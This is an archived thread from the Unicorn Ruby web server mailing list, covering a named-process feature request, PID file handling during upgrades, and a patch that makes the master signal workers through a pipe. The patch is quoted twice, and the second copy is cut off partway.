  http://mid.gmane.org/20110819022316.GA2951@dcvr.yhbt.net

> I can be cc’d at bob@gigglemania.co.uk.

Done :>
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Suggestion for Named Process
@ 2014-01-15 11:37  3% Bob McKinven
  2014-01-15 18:19  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Bob McKinven @ 2014-01-15 11:37 UTC (permalink / raw)
  To: mongrel-unicorn

Hi,

When running multiple rails apps on the same server it can become a pain identifying which 'unicorn_rails master’ process is running which app (can’t always tell from the user).

My suggestion is for a --name option to allow each process to be named individually.

E.g.  "unicorn_rails —name tiddles_unicorn -D” would show  “tiddles_unicorn master” & “tiddles_unicorn worker[1]” when using PS

I can be cc’d at bob@gigglemania.co.uk.

Cheers.

Bob
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Issues with PID file renaming
  2013-12-12 19:15  3%           ` Petteri Räty
@ 2013-12-12 20:51  0%             ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-12-12 20:51 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> On 11.12.2013 15.54, Michael Fischer wrote:
> > On Tue, Dec 10, 2013 at 10:44 PM, Petteri Räty <betelgeuse@gentoo.org> wrote:
> > 
> >> At least for pid based monitoring tools it is (I do agree with others
> >> that you should also be monitoring http though). For example monit
> >> requires that you give it a pid file. Why is it wrong for them to point
> >> to the same pid?
> > 
> > Monit doesn't require a pid, never has:
> > 
> > http://mmonit.com/monit/documentation/monit.html#connection_testing
> > 
> 
> If you only want to do connection testing. What if you want to monitor
> the memory usage of unicorn processes?

Your monitoring has to adapt to the new processes anyways.  Can it
really not deal with a PID file being temporarily absent?

There's a plethora of tools in the wild which deal with PID files.
Consider this case:

It's likely a tool will see foo.pid.oldbin existing, and wait for
foo.pid to become available.  If foo.pid is already available from a
hardlink, it'll be pointing to the old PID, and any tool which backs out
of the upgrade by intending to kill the new PID will end up hitting the
old one.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Issues with PID file renaming
  2013-12-11 13:54  0%         ` Michael Fischer
@ 2013-12-12 19:15  3%           ` Petteri Räty
  2013-12-12 20:51  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Petteri Räty @ 2013-12-12 19:15 UTC (permalink / raw)
  To: mongrel-unicorn

On 11.12.2013 15.54, Michael Fischer wrote:
> On Tue, Dec 10, 2013 at 10:44 PM, Petteri Räty <betelgeuse@gentoo.org> wrote:
> 
>> At least for pid based monitoring tools it is (I do agree with others
>> that you should also be monitoring http though). For example monit
>> requires that you give it a pid file. Why is it wrong for them to point
>> to the same pid?
> 
> Monit doesn't require a pid, never has:
> 
> http://mmonit.com/monit/documentation/monit.html#connection_testing
> 

If you only want to do connection testing. What if you want to monitor
the memory usage of unicorn processes?

> To answer your question, though, the reason the pid files must contain
> different PIDs is that the two processes (previous and
> current-generation masters) have different PIDs.  And some of us do
> care that they differ :)
> 

Eric's original comment and my response was about the pid files having
the same content (albeit shortly).

Regards,
Petteri

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Issues with PID file renaming
  2013-12-10 22:44  3%       ` Petteri Räty
@ 2013-12-11 13:54  0%         ` Michael Fischer
  2013-12-12 19:15  3%           ` Petteri Räty
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-12-11 13:54 UTC (permalink / raw)
  To: unicorn list

On Tue, Dec 10, 2013 at 10:44 PM, Petteri Räty <betelgeuse@gentoo.org> wrote:

> At least for pid based monitoring tools it is (I do agree with others
> that you should also be monitoring http though). For example monit
> requires that you give it a pid file. Why is it wrong for them to point
> to the same pid?

Monit doesn't require a pid, never has:

http://mmonit.com/monit/documentation/monit.html#connection_testing

To answer your question, though, the reason the pid files must contain
different PIDs is that the two processes (previous and
current-generation masters) have different PIDs.  And some of us do
care that they differ :)

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Issues with PID file renaming
  2013-12-10 19:52  3%     ` Eric Wong
@ 2013-12-10 22:44  3%       ` Petteri Räty
  2013-12-11 13:54  0%         ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Petteri Räty @ 2013-12-10 22:44 UTC (permalink / raw)
  To: mongrel-unicorn

On 10.12.2013 21.52, Eric Wong wrote:
> Petteri Räty <betelgeuse@gentoo.org> wrote:
>> On 26.11.2013 3.20, Eric Wong wrote:
>>> How about having the old process create a hard link to .oldbin,
>>> and having the new one override the pid if Process.ppid == pid file?
>>> The check is still racy, but that's what pid files are :<
>>
>> Isn't it possible to always keep a valid pid file by using the fact that
>> mv is atomic? Basically the new process writes the pid first to a temp
>> file and then moves it over the old pid file after having hard linked
>> the file to .oldbin?
>>
>> $ echo "1" > foo.pid
>> $ ln foo.pid foo.oldpid
>> $ echo "2" > tmp
>> $ mv tmp foo.pid
>> $ cat *pid
>> 1
>> 2
> 
> It's possible, but is it worth it?  Having both pid files point to the
> same pid is still wrong.
> 

At least for pid based monitoring tools it is (I do agree with others
that you should also be monitoring http though). For example monit
requires that you give it a pid file. Why is it wrong for them to point
to the same pid? Seems ok to me especially since they share the inode.
Any way I think this is better than there being no pid file. After all
we are doing a zero downtime deploy which means there's always a valid
process.

Regards,
Petteri
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Issues with PID file renaming
  @ 2013-12-10 19:52  3%     ` Eric Wong
  2013-12-10 22:44  3%       ` Petteri Räty
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-12-10 19:52 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> On 26.11.2013 3.20, Eric Wong wrote:
> > How about having the old process create a hard link to .oldbin,
> > and having the new one override the pid if Process.ppid == pid file?
> > The check is still racy, but that's what pid files are :<
> 
> Isn't it possible to always keep a valid pid file by using the fact that
> mv is atomic? Basically the new process writes the pid first to a temp
> file and then moves it over the old pid file after having hard linked
> the file to .oldbin?
> 
> $ echo "1" > foo.pid
> $ ln foo.pid foo.oldpid
> $ echo "2" > tmp
> $ mv tmp foo.pid
> $ cat *pid
> 1
> 2

It's possible, but is it worth it?  Having both pid files point to the
same pid is still wrong.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] rework master-to-worker signaling to use a pipe
  2013-12-09  9:52  2% [PATCH] rework master-to-worker signaling to use a pipe Eric Wong
@ 2013-12-10  0:22  0% ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2013-12-10  0:22 UTC (permalink / raw)
  To: unicorn list

Eric,

Your work on unicorn is exemplary and responsiveness second to none. I
did want to take a full circle back though on the issue.

After discussing with tmm1 and ko1 the conclusion is that pg is using
ubfs incorrectly. They are just there to unblock io, not as a
termination hook, once io is unblocked you still need to be able to
re-acquire. pg was using ubfs as termination hooks. See full
discussion at: https://groups.google.com/forum/#!topic/ruby-pg/5_ylGmog1S4

The end result is that I suggested Lars open a ticket for redmine if
we need a ubfs to act as termination hooks, the change to pg was
reverted.

Bottom line is that your change is not really required.

Thanks you so much for being super responsive here. Sorry if I caused
you to go on a tangent you did need to go on.

Sam

On Mon, Dec 9, 2013 at 8:52 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Signaling using normal kill(2) is preserved, but the master now
> prefers to signal workers using a pipe rather than kill(2).
> Non-graceful signals (:TERM/:KILL) are still sent using kill(2),
> as they ask for immediate shutdown.
>
> This change is necessary to avoid triggering the ubf (unblocking
> function) for rb_thread_call_without_gvl (and similar) functions
> extensions.  Most notably, this fixes compatibility with newer
> versions of the 'pg' gem which will cancel a running DB query if
> signaled[1].
>
> This also has the nice side-effect of allowing a premature
> master death (assuming preload_app didn't cause the master to
> spawn off rogue child daemons).
>
> Note: users should also refrain from using "killall" if using the
> 'pg' gem or something like it.
>
> Unfortunately, this increases FD usage in the master as the writable
> end of the pipe is preserved in the master.  This limit the number
> of worker processes the master may run to the open file limit of the
> master process.  Increasing the open file limit of the master
> process may be needed.  However, the FD use on the workers is
> reduced by one as the internal self-pipe is no longer used.  Thus,
> overall pipe allocation for the kernel remains unchanged.
>
> [1] - pg is correct to cancel a query, as it cannot know if
>       the signal was for a) graceful unicorn shutdown or
>       b) oh-noes-I-started-a-bad-query-ABORT-ABORT-ABORT!!
> ---
>   Pushed to master on git://bogomips.org/unicorn.git
>   commit 6f6e4115b4bb03e5e7c55def91527799190566f2
>
>  SIGNALS                    |  6 ++++
>  lib/unicorn.rb             |  5 +++
>  lib/unicorn/http_server.rb | 85 +++++++++++++++++++++++-----------------------
>  lib/unicorn/worker.rb      | 64 ++++++++++++++++++++++++++++++++++
>  4 files changed, 118 insertions(+), 42 deletions(-)
>
> diff --git a/SIGNALS b/SIGNALS
> index 48c651e..ef0b0d9 100644
> --- a/SIGNALS
> +++ b/SIGNALS
> @@ -45,6 +45,10 @@ http://unicorn.bogomips.org/examples/init.sh
>
>  === Worker Processes
>
> +Note: as of unicorn 4.8, the master uses a pipe to signal workers
> +instead of kill(2) for most cases.  Using signals still (and works and
> +remains supported for external tools/libraries), however.
> +
>  Sending signals directly to the worker processes should not normally be
>  needed.  If the master process is running, any exited worker will be
>  automatically respawned.
> @@ -52,6 +56,8 @@ automatically respawned.
>  * INT/TERM - Quick shutdown, immediately exit.
>    Unless WINCH has been sent to the master (or the master is killed),
>    the master process will respawn a worker to replace this one.
> +  Immediate shutdown is still triggered using kill(2) and not the
> +  internal pipe as of unicorn 4.8
>
>  * QUIT - Gracefully exit after finishing the current request.
>    Unless WINCH has been sent to the master (or the master is killed),
> diff --git a/lib/unicorn.rb b/lib/unicorn.rb
> index 2535159..638b846 100644
> --- a/lib/unicorn.rb
> +++ b/lib/unicorn.rb
> @@ -97,6 +97,11 @@ module Unicorn
>      logger.error "#{prefix}: #{message} (#{exc.class})"
>      exc.backtrace.each { |line| logger.error(line) }
>    end
> +
> +  # remove this when we only support Ruby >= 2.0
> +  def self.pipe # :nodoc:
> +    Kgio::Pipe.new.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
> +  end
>    # :startdoc:
>  end
>  # :enddoc:
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index f15c8a7..ae8ad13 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -42,16 +42,8 @@ class Unicorn::HttpServer
>    # it to wake up the master from IO.select in exactly the same manner
>    # djb describes in http://cr.yp.to/docs/selfpipe.html
>    #
> -  # * The workers immediately close the pipe they inherit from the
> -  # master and replace it with a new pipe after forking.  This new
> -  # pipe is also used to wakeup from IO.select from inside (worker)
> -  # signal handlers.  However, workers *close* the pipe descriptors in
> -  # the signal handlers to raise EBADF in IO.select instead of writing
> -  # like we do in the master.  We cannot easily use the reader set for
> -  # IO.select because LISTENERS is already that set, and it's extra
> -  # work (and cycles) to distinguish the pipe FD from the reader set
> -  # once IO.select returns.  So we're lazy and just close the pipe when
> -  # a (rare) signal arrives in the worker and reinitialize the pipe later.
> +  # * The workers immediately close the pipe they inherit.  See the
> +  # Unicorn::Worker class for the pipe workers use.
>    SELF_PIPE = []
>
>    # signal queue used for self-piping
> @@ -127,7 +119,7 @@ class Unicorn::HttpServer
>      inherit_listeners!
>      # this pipe is used to wake us up from select(2) in #join when signals
>      # are trapped.  See trap_deferred.
> -    init_self_pipe!
> +    SELF_PIPE.replace(Unicorn.pipe)
>
>      # setup signal handlers before writing pid file in case people get
>      # trigger happy and send signals as soon as the pid file exists.
> @@ -306,14 +298,14 @@ class Unicorn::HttpServer
>          logger.info "master reopening logs..."
>          Unicorn::Util.reopen_logs
>          logger.info "master done reopening logs"
> -        kill_each_worker(:USR1)
> +        soft_kill_each_worker(:USR1)
>        when :USR2 # exec binary, stay alive in case something went wrong
>          reexec
>        when :WINCH
>          if Unicorn::Configurator::RACKUP[:daemonized]
>            respawn = false
>            logger.info "gracefully stopping all workers"
> -          kill_each_worker(:QUIT)
> +          soft_kill_each_worker(:QUIT)
>            self.worker_processes = 0
>          else
>            logger.info "SIGWINCH ignored because we're not daemonized"
> @@ -345,7 +337,11 @@ class Unicorn::HttpServer
>      self.listeners = []
>      limit = Time.now + timeout
>      until WORKERS.empty? || Time.now > limit
> -      kill_each_worker(graceful ? :QUIT : :TERM)
> +      if graceful
> +        soft_kill_each_worker(:QUIT)
> +      else
> +        kill_each_worker(:TERM)
> +      end
>        sleep(0.1)
>        reap_all_workers
>      end
> @@ -498,6 +494,7 @@ class Unicorn::HttpServer
>    end
>
>    def after_fork_internal
> +    SELF_PIPE.each { |io| io.close }.clear # this is master-only, now
>      @ready_pipe.close if @ready_pipe
>      Unicorn::Configurator::RACKUP.clear
>      @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
> @@ -517,6 +514,7 @@ class Unicorn::HttpServer
>        before_fork.call(self, worker)
>        if pid = fork
>          WORKERS[pid] = worker
> +        worker.atfork_parent
>        else
>          after_fork_internal
>          worker_loop(worker)
> @@ -531,9 +529,7 @@ class Unicorn::HttpServer
>    def maintain_worker_count
>      (off = WORKERS.size - worker_processes) == 0 and return
>      off < 0 and return spawn_missing_workers
> -    WORKERS.dup.each_pair { |wpid,w|
> -      w.nr >= worker_processes and kill_worker(:QUIT, wpid) rescue nil
> -    }
> +    WORKERS.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
>    end
>
>    # if we get any error, try to write something back to the client
> @@ -600,6 +596,7 @@ class Unicorn::HttpServer
>    # traps for USR1, USR2, and HUP may be set in the after_fork Proc
>    # by the user.
>    def init_worker_process(worker)
> +    worker.atfork_child
>      # we'll re-trap :QUIT later for graceful shutdown iff we accept clients
>      EXIT_SIGS.each { |sig| trap(sig) { exit!(0) } }
>      exit!(0) if (SIG_QUEUE & EXIT_SIGS)[0]
> @@ -608,23 +605,27 @@ class Unicorn::HttpServer
>      SIG_QUEUE.clear
>      proc_name "worker[#{worker.nr}]"
>      START_CTX.clear
> -    init_self_pipe!
>      WORKERS.clear
> +
> +    after_fork.call(self, worker) # can drop perms and create listeners
>      LISTENERS.each { |sock| sock.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
> -    after_fork.call(self, worker) # can drop perms
> +
>      worker.user(*user) if user.kind_of?(Array) && ! worker.switched
>      self.timeout /= 2.0 # halve it for select()
>      @config = nil
>      build_app! unless preload_app
>      ssl_enable!
>      @after_fork = @listener_opts = @orig_app = nil
> +    readers = LISTENERS.dup
> +    readers << worker
> +    trap(:QUIT) { readers.each { |io| io.close }.replace([false]) }
> +    readers
>    end
>
>    def reopen_worker_logs(worker_nr)
>      logger.info "worker=#{worker_nr} reopening logs..."
>      Unicorn::Util.reopen_logs
>      logger.info "worker=#{worker_nr} done reopening logs"
> -    init_self_pipe!
>      rescue => e
>        logger.error(e) rescue nil
>        exit!(77) # EX_NOPERM in sysexits.h
> @@ -635,22 +636,24 @@ class Unicorn::HttpServer
>    # given a INT, QUIT, or TERM signal)
>    def worker_loop(worker)
>      ppid = master_pid
> -    init_worker_process(worker)
> +    readers = init_worker_process(worker)
>      nr = 0 # this becomes negative if we need to reopen logs
> -    l = LISTENERS.dup
> -    ready = l.dup
>
> -    # closing anything we IO.select on will raise EBADF
> -    trap(:USR1) { nr = -65536; SELF_PIPE[0].close rescue nil }
> -    trap(:QUIT) { worker = nil; LISTENERS.each { |s| s.close rescue nil }.clear }
> -    logger.info "worker=#{worker.nr} ready"
> +    # this only works immediately if the master sent us the signal
> +    # (which is the normal case)
> +    trap(:USR1) { nr = -65536 }
> +
> +    ready = readers.dup
> +    @logger.info "worker=#{worker.nr} ready"
>
>      begin
>        nr < 0 and reopen_worker_logs(worker.nr)
>        nr = 0
> -
>        worker.tick = Time.now.to_i
> -      while sock = ready.shift
> +      tmp = ready.dup
> +      while sock = tmp.shift
> +        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
> +        # but that will return false
>          if client = sock.kgio_tryaccept
>            process_client(client)
>            nr += 1
> @@ -663,8 +666,8 @@ class Unicorn::HttpServer
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0 # (nr < 0) => reopen logs (unlikely)
> -        ready = l.dup
> +      unless nr == 0
> +        tmp = ready.dup
>          redo
>        end
>
> @@ -672,11 +675,11 @@ class Unicorn::HttpServer
>
>        # timeout used so we can detect parent death:
>        worker.tick = Time.now.to_i
> -      ret = IO.select(l, nil, SELF_PIPE, @timeout) and ready = ret[0]
> +      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
>      rescue => e
> -      redo if nr < 0 && (Errno::EBADF === e || IOError === e) # reopen logs
> -      Unicorn.log_error(@logger, "listen loop error", e) if worker
> -    end while worker
> +      redo if nr < 0
> +      Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
> +    end while readers[0]
>    end
>
>    # delivers a signal to a worker and fails gracefully if the worker
> @@ -692,6 +695,10 @@ class Unicorn::HttpServer
>      WORKERS.keys.each { |wpid| kill_worker(signal, wpid) }
>    end
>
> +  def soft_kill_each_worker(signal)
> +    WORKERS.each_value { |worker| worker.soft_kill(signal) }
> +  end
> +
>    # unlinks a PID file at given +path+ if it contains the current PID
>    # still potentially racy without locking the directory (which is
>    # non-portable and may interact badly with other programs), but the
> @@ -720,7 +727,7 @@ class Unicorn::HttpServer
>      config[:listeners].replace(@init_listeners)
>      config.reload
>      config.commit!(self)
> -    kill_each_worker(:QUIT)
> +    soft_kill_each_worker(:QUIT)
>      Unicorn::Util.reopen_logs
>      self.app = orig_app
>      build_app! if preload_app
> @@ -756,12 +763,6 @@ class Unicorn::HttpServer
>      io.sync = true
>    end
>
> -  def init_self_pipe!
> -    SELF_PIPE.each { |io| io.close rescue nil }
> -    SELF_PIPE.replace(Kgio::Pipe.new)
> -    SELF_PIPE.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
> -  end
> -
>    def inherit_listeners!
>      # inherit sockets from parents, they need to be plain Socket objects
>      # before they become Kgio::UNIXServer or Kgio::TCPServer
> diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
> index 1fb6a4a..e74a1c9 100644
> --- a/lib/unicorn/worker.rb
> +++ b/lib/unicorn/worker.rb
> @@ -12,6 +12,7 @@ class Unicorn::Worker
>    # :stopdoc:
>    attr_accessor :nr, :switched
>    attr_writer :tmp
> +  attr_reader :to_io # IO.select-compatible
>
>    PER_DROP = Raindrops::PAGE_SIZE / Raindrops::SIZE
>    DROPS = []
> @@ -23,6 +24,66 @@ class Unicorn::Worker
>      @raindrop[@offset] = 0
>      @nr = nr
>      @tmp = @switched = false
> +    @to_io, @master = Unicorn.pipe
> +  end
> +
> +  def atfork_child # :nodoc:
> +    # we _must_ close in child, parent just holds this open to signal
> +    @master = @master.close
> +  end
> +
> +  # master fakes SIGQUIT using this
> +  def quit # :nodoc:
> +    @master = @master.close if @master
> +  end
> +
> +  # parent does not read
> +  def atfork_parent # :nodoc:
> +    @to_io = @to_io.close
> +  end
> +
> +  # call a signal handler immediately without triggering EINTR
> +  # We do not use the more obvious Process.kill(sig, $$) here since
> +  # that signal delivery may be deferred.  We want to avoid signal delivery
> +  # while the Rack app.call is running because some database drivers
> +  # (e.g. ruby-pg) may cancel pending requests.
> +  def fake_sig(sig) # :nodoc:
> +    old_cb = trap(sig, "IGNORE")
> +    old_cb.call
> +  ensure
> +    trap(sig, old_cb)
> +  end
> +
> +  # master sends fake signals to children
> +  def soft_kill(sig) # :nodoc:
> +    case sig
> +    when Integer
> +      signum = sig
> +    else
> +      signum = Signal.list[sig.to_s] or
> +          raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
> +    end
> +    # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
> +    # Do not care in the odd case the buffer is full, here.
> +    @master.kgio_trywrite([signum].pack('l'))
> +  rescue Errno::EPIPE
> +    # worker will be reaped soon
> +  end
> +
> +  # this only runs when the Rack app.call is not running
> +  # act like a listener
> +  def kgio_tryaccept # :nodoc:
> +    case buf = @to_io.kgio_tryread(4)
> +    when String
> +      # unpack the buffer and trigger the signal handler
> +      signum = buf.unpack('l')
> +      fake_sig(signum[0])
> +      # keep looping, more signals may be queued
> +    when nil # EOF: master died, but we are at a safe place to exit
> +      fake_sig(:QUIT)
> +    when :wait_readable # keep waiting
> +      return false
> +    end while true # loop, as multiple signals may be sent
>    end
>
>    # worker objects may be compared to just plain Integers
> @@ -49,8 +110,11 @@ class Unicorn::Worker
>      end
>    end
>
> +  # called in both the master (reaping worker) and worker (SIGQUIT handler)
>    def close # :nodoc:
>      @tmp.close if @tmp
> +    @master.close if @master
> +    @to_io.close if @to_io
>    end
>
>    # :startdoc:
> --
> Eric Wong
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* [PATCH] rework master-to-worker signaling to use a pipe
@ 2013-12-09  9:52  2% Eric Wong
  2013-12-10  0:22  0% ` Sam Saffron
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-12-09  9:52 UTC (permalink / raw)
  To: mongrel-unicorn

Signaling using normal kill(2) is preserved, but the master now
prefers to signal workers using a pipe rather than kill(2).
Non-graceful signals (:TERM/:KILL) are still sent using kill(2),
as they ask for immediate shutdown.

This change is necessary to avoid triggering the ubf (unblocking
function) for rb_thread_call_without_gvl (and similar) functions
extensions.  Most notably, this fixes compatibility with newer
versions of the 'pg' gem which will cancel a running DB query if
signaled[1].

This also has the nice side-effect of allowing a premature
master death (assuming preload_app didn't cause the master to
spawn off rogue child daemons).

Note: users should also refrain from using "killall" if using the
'pg' gem or something like it.

Unfortunately, this increases FD usage in the master as the writable
end of the pipe is preserved in the master.  This limit the number
of worker processes the master may run to the open file limit of the
master process.  Increasing the open file limit of the master
process may be needed.  However, the FD use on the workers is
reduced by one as the internal self-pipe is no longer used.  Thus,
overall pipe allocation for the kernel remains unchanged.

[1] - pg is correct to cancel a query, as it cannot know if
      the signal was for a) graceful unicorn shutdown or
      b) oh-noes-I-started-a-bad-query-ABORT-ABORT-ABORT!!
---
  Pushed to master on git://bogomips.org/unicorn.git
  commit 6f6e4115b4bb03e5e7c55def91527799190566f2

 SIGNALS                    |  6 ++++
 lib/unicorn.rb             |  5 +++
 lib/unicorn/http_server.rb | 85 +++++++++++++++++++++++-----------------------
 lib/unicorn/worker.rb      | 64 ++++++++++++++++++++++++++++++++++
 4 files changed, 118 insertions(+), 42 deletions(-)

diff --git a/SIGNALS b/SIGNALS
index 48c651e..ef0b0d9 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -45,6 +45,10 @@ http://unicorn.bogomips.org/examples/init.sh
 
 === Worker Processes
 
+Note: as of unicorn 4.8, the master uses a pipe to signal workers
+instead of kill(2) for most cases.  Using signals still (and works and
+remains supported for external tools/libraries), however.
+
 Sending signals directly to the worker processes should not normally be
 needed.  If the master process is running, any exited worker will be
 automatically respawned.
@@ -52,6 +56,8 @@ automatically respawned.
 * INT/TERM - Quick shutdown, immediately exit.
   Unless WINCH has been sent to the master (or the master is killed),
   the master process will respawn a worker to replace this one.
+  Immediate shutdown is still triggered using kill(2) and not the
+  internal pipe as of unicorn 4.8
 
 * QUIT - Gracefully exit after finishing the current request.
   Unless WINCH has been sent to the master (or the master is killed),
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 2535159..638b846 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -97,6 +97,11 @@ module Unicorn
     logger.error "#{prefix}: #{message} (#{exc.class})"
     exc.backtrace.each { |line| logger.error(line) }
   end
+
+  # remove this when we only support Ruby >= 2.0
+  def self.pipe # :nodoc:
+    Kgio::Pipe.new.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
+  end
   # :startdoc:
 end
 # :enddoc:
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f15c8a7..ae8ad13 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -42,16 +42,8 @@ class Unicorn::HttpServer
   # it to wake up the master from IO.select in exactly the same manner
   # djb describes in http://cr.yp.to/docs/selfpipe.html
   #
-  # * The workers immediately close the pipe they inherit from the
-  # master and replace it with a new pipe after forking.  This new
-  # pipe is also used to wakeup from IO.select from inside (worker)
-  # signal handlers.  However, workers *close* the pipe descriptors in
-  # the signal handlers to raise EBADF in IO.select instead of writing
-  # like we do in the master.  We cannot easily use the reader set for
-  # IO.select because LISTENERS is already that set, and it's extra
-  # work (and cycles) to distinguish the pipe FD from the reader set
-  # once IO.select returns.  So we're lazy and just close the pipe when
-  # a (rare) signal arrives in the worker and reinitialize the pipe later.
+  # * The workers immediately close the pipe they inherit.  See the
+  # Unicorn::Worker class for the pipe workers use.
   SELF_PIPE = []
 
   # signal queue used for self-piping
@@ -127,7 +119,7 @@ class Unicorn::HttpServer
     inherit_listeners!
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
-    init_self_pipe!
+    SELF_PIPE.replace(Unicorn.pipe)
 
     # setup signal handlers before writing pid file in case people get
     # trigger happy and send signals as soon as the pid file exists.
@@ -306,14 +298,14 @@ class Unicorn::HttpServer
         logger.info "master reopening logs..."
         Unicorn::Util.reopen_logs
         logger.info "master done reopening logs"
-        kill_each_worker(:USR1)
+        soft_kill_each_worker(:USR1)
       when :USR2 # exec binary, stay alive in case something went wrong
         reexec
       when :WINCH
         if Unicorn::Configurator::RACKUP[:daemonized]
           respawn = false
           logger.info "gracefully stopping all workers"
-          kill_each_worker(:QUIT)
+          soft_kill_each_worker(:QUIT)
           self.worker_processes = 0
         else
           logger.info "SIGWINCH ignored because we're not daemonized"
@@ -345,7 +337,11 @@ class Unicorn::HttpServer
     self.listeners = []
     limit = Time.now + timeout
     until WORKERS.empty? || Time.now > limit
-      kill_each_worker(graceful ? :QUIT : :TERM)
+      if graceful
+        soft_kill_each_worker(:QUIT)
+      else
+        kill_each_worker(:TERM)
+      end
       sleep(0.1)
       reap_all_workers
     end
@@ -498,6 +494,7 @@ class Unicorn::HttpServer
   end
 
   def after_fork_internal
+    SELF_PIPE.each { |io| io.close }.clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
     @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
@@ -517,6 +514,7 @@ class Unicorn::HttpServer
       before_fork.call(self, worker)
       if pid = fork
         WORKERS[pid] = worker
+        worker.atfork_parent
       else
         after_fork_internal
         worker_loop(worker)
@@ -531,9 +529,7 @@ class Unicorn::HttpServer
   def maintain_worker_count
     (off = WORKERS.size - worker_processes) == 0 and return
     off < 0 and return spawn_missing_workers
-    WORKERS.dup.each_pair { |wpid,w|
-      w.nr >= worker_processes and kill_worker(:QUIT, wpid) rescue nil
-    }
+    WORKERS.each_value { |w| w.nr >= worker_processes and w.soft_kill(:QUIT) }
   end
 
   # if we get any error, try to write something back to the client
@@ -600,6 +596,7 @@ class Unicorn::HttpServer
   # traps for USR1, USR2, and HUP may be set in the after_fork Proc
   # by the user.
   def init_worker_process(worker)
+    worker.atfork_child
     # we'll re-trap :QUIT later for graceful shutdown iff we accept clients
     EXIT_SIGS.each { |sig| trap(sig) { exit!(0) } }
     exit!(0) if (SIG_QUEUE & EXIT_SIGS)[0]
@@ -608,23 +605,27 @@ class Unicorn::HttpServer
     SIG_QUEUE.clear
     proc_name "worker[#{worker.nr}]"
     START_CTX.clear
-    init_self_pipe!
     WORKERS.clear
+
+    after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
-    after_fork.call(self, worker) # can drop perms
+
     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
     self.timeout /= 2.0 # halve it for select()
     @config = nil
     build_app! unless preload_app
     ssl_enable!
     @after_fork = @listener_opts = @orig_app = nil
+    readers = LISTENERS.dup
+    readers << worker
+    trap(:QUIT) { readers.each { |io| io.close }.replace([false]) }
+    readers
   end
 
   def reopen_worker_logs(worker_nr)
     logger.info "worker=#{worker_nr} reopening logs..."
     Unicorn::Util.reopen_logs
     logger.info "worker=#{worker_nr} done reopening logs"
-    init_self_pipe!
     rescue => e
       logger.error(e) rescue nil
